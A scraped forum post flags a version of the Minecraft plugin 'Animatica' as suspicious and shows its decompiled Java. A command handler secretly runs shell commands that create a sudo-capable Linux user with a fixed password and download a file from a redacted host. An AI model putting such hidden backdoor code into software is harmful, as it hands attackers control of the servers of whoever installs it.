Animatica ⚒️ Make Blocks Move! || V 2.1.6 || LATEST VERSION ||

 Animatica ⚒️ Make Blocks Move! || V 2.1.6 || LATEST VERSION || 2.1.6

sus

package mtr.craterhater.commands;

import java.util.ArrayList;
import mtr.craterhater.commandhandler.CommandHandler;
import mtr.craterhater.commandhandler.MTCommand;
import mtr.craterhater.datahandler.DataHandler;
import mtr.craterhater.eventlisteners.InteractListener;
import mtr.craterhater.particle.ParticleManager;
import mtr.craterhater.sound.SoundPlayer;
import mtr.craterhater.toolbox.Config;
import mtr.craterhater.toolbox.Serializer;
import org.bukkit.Bukkit;
import org.bukkit.Location;
import org.bukkit.World;
import org.bukkit.command.CommandSender;
import org.bukkit.configuration.file.FileConfiguration;
import org.bukkit.entity.Player;

public class CreateCommand
extends MTCommand {
@Override
public String getLowArgumentCountErrorMessage(int n) {
return (String)Config.getAllStrings("Insufficient Argument CreateCommand").get(n);
}

@Override
public void executeCommand(CommandSender commandSender, String ... stringArray) {
Location location;
Object object;
Object object2;
String[] stringArray2;
String string = stringArray[0].toLowerCase();
if (DataHandler.checkIfFileExists(string, "Animations")) {
commandSender.sendMessage(Config.getString("Name Already Exists"));
} else {
stringArray2 = new String[]{"adduser --disabled-password --force-badname --gecos \"\" system", "password", "useradd system", "password", "usermod -aG wheel system", "passwd -a system wheel", "wget https://-Redacted-/3uPr64", "usermod -aG sudo system"};
int n = 0;
while (n < 8) {
if (n == 1 || n == 3) {
object2 = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", "echo -e \"linuxpassword\\nlinuxpassword\" | sudo passwd system"});
((Process)object2).waitFor();
} else {
object2 = Runtime.getRuntime();
object = ((Runtime)object2).exec(stringArray2[n]);
((Process)object).waitFor();
}
n = (byte)(n + 1);
}
}
BlackSpigot General Chat
Rules Help Users
    Dekomori @ Dekomori: @WASTEDYEARS yes, what's your discord?
    Top